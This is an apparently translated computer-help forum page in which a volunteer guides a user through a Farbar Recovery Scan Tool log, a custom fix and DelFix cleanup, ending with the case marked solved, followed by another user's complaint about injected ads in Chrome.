2019-01-04 19:32 - 2010-11-20 22:01 - 000713888 _____ C:\Windows\system32\PerfStringBackup.INI
2019-01-04 19:32 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\inf
2019-01-04 19:26 - 2009-07-14 05:53 - 000000006 ____H C:\Windows\Tasks\SA.DAT
2019-01-04 19:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2019-01-04 19:25 - 2009-07-14 05:34 - 000016640 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2019-01-04 03:15 - 2009-07-14 05:52 - 000000000 ___RD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Games
2019-01-04 03:15 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\sysprep
2019-01-04 03:12 - 2010-11-21 01:46 - 000000000 ____D C:\Windows\CSC
2019-01-04 03:10 - 2009-07-14 05:52 - 000028672 _____ C:\Windows\system32\config\BCD-Template
2019-01-03 19:01 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\system32\GroupPolicy
2019-01-03 18:57 - 2018-08-11 19:54 - 000000000 ____D C:\Intel
2019-01-03 18:57 - 2017-10-21 13:53 - 000000000 ____D C:\LFS
2019-01-03 18:57 - 2017-09-25 20:50 - 000000000 ___RD C:\BECKO-PC
2019-01-03 18:57 - 2017-04-14 15:10 - 000036892 ____H C:\iCS Source.suo.nybmyxmig
2019-01-03 18:33 - 2009-07-14 05:33 - 000266808 _____ C:\Windows\system32\FNTCACHE.DAT
2019-01-03 18:31 - 2009-07-14 03:37 - 000000000 __RHD C:\Users\Public\Libraries
2019-01-03 17:30 - 2009-07-14 03:37 - 000000000 ____D C:\Windows\rescache
2019-01-03 15:34 - 2018-08-11 14:17 - 000000000 ____D C:\Users\ВЕС\Downloads\k-meleon
2019-01-01 13:09 - 2018-09-02 13:32 - 000000000 ____D C:\Users\ВЕС\Documents\TalkHelper

==================== Files in the root of some directories =======

1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Users\ВЕС\AppData\Local\aIQEonJ.exe
2019-01-03 19:10 - 2019-01-03 19:10 - 006161408 _____ () C:\Users\ВЕС\AppData\Local\dump007.dat
2019-01-03 19:01 - 2019-01-03 19:01 - 000140800 _____ () C:\Users\ВЕС\AppData\Local\installer.dat
2019-01-03 19:00 - 2019-01-03 19:00 - 000000003 _____ () C:\Users\ВЕС\AppData\Local\wbem.ini

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\explorer.exe => File is digitally signed
C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2019-01-04 03:11

==================== End of FRST.txt ============================

Addition.txt

Fix with Farbar Recovery Scan Tool

Download the attached file fixlist.txt and save it in the same location where you downloaded FRST.exe.
Run FRST.exe again, press the Fix button once, and wait.

A new log file, FixLog.txt, will be created. Attach its contents in your next comment.

NOTE: This script was written specifically for this user and for this particular machine. Running the fix on another computer may damage your operating system.

Logs

In your next reply, please include the following logs:

  • FixLog.txt


Well, that will be all from me... How is your system now? Do you notice anything that worries you?

 


The system is fine, thank you for your time and attention.


All that remains is to remove the programs we used:

To remove Farbar Recovery Scan Tool properly, rename the executable FRST64.exe (or FRST.exe) to Uninstall.exe.

Run Uninstall.exe. You will be notified that you need to restart the system in order to delete the tool.

Download DelFix and run it. Tick the boxes next to:

  • Remove disinfection tools <----- this will remove the tools we used
  • Create registry backup <----- this option will create a backup copy of the Windows registry
  • Purge system restore <--- this will remove all previous restore points; a new restore point of the system's current state will be created.
  • Reset system settings <--- this will reset to default all system settings that were changed either by us during the cleanup or by malware / an infection

...and then press the Run button.

  • Once the operation has finished, a log will be created
  • Copy it and paste it into your next reply

The tool will delete itself once it has finished its task!

Logs:

In your next reply, please include the following logs:

  • DelFix

 


# DelFix v1.013 - Logfile created 04/01/2019 at 20:29:37
# Updated 17/04/2016 by Xplode
# Username : ВЕС - WIN-SKFJ6HLGST2
# Operating System : Windows 7 Ultimate Service Pack 1 (32 bits)

~ Removing disinfection tools ...

Deleted : C:\TDSSKiller.3.1.0.25_04.01.2019_19.28.10_log.txt
Deleted : C:\Users\ВЕС\Downloads\tdsskiller.exe

~ Creating registry backup ... OK

~ Cleaning system restore ...

Deleted : RP #3 [Windows Update | 01/03/2019 17:36:13]
Deleted : RP #4 [Windows Update | 01/03/2019 17:53:03]
Deleted : RP #6 [Restore Point Created by FRST | 01/04/2019 19:05:14]

New restore point created !

~ Resetting system settings ... OK

########## - EOF - ##########
 


Wonderful! :) Thank you for your proper cooperation! I am marking the case as "Solved". I wish you a pleasant evening and a safe internet! :)


Have a nice evening

 


      C:\WINDOWS\system32\services.exe => File is digitally signed
      C:\WINDOWS\system32\User32.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\User32.dll => File is digitally signed
      C:\WINDOWS\system32\userinit.exe => File is digitally signed
      C:\WINDOWS\SysWOW64\userinit.exe => File is digitally signed
      C:\WINDOWS\system32\rpcss.dll => File is digitally signed
      C:\WINDOWS\system32\dnsapi.dll => File is digitally signed
      C:\WINDOWS\SysWOW64\dnsapi.dll => File is digitally signed
      C:\WINDOWS\system32\Drivers\volsnap.sys => File is digitally signed
      LastRegBack: 2018-12-08 22:12
      ==================== End of FRST.txt ============================
       
      Addition.txt
    • by roggoto
      Hello!
      I use Google Chrome, but for some time now (it did not bother me until it became a thorn in my side) the same ads/banners in Russian have been appearing, showing absolute nonsense, sometimes even pornographic pictures, on top of the original ads that were paid for to appear on the internet! Whichever site I open, they immediately cover the slots for the paid ads, on top of the original ones that are supposed to appear there! Then today I played a video on a Bulgarian TV site and saw that they appear over the video itself, and in this way they also block the video's controls for pausing, playing and enlarging the screen (I have attached a screenshot)! If anyone knows how to stop/remove this nuisance, I would be grateful if they shared!

      Addition.txt
      FRST.txt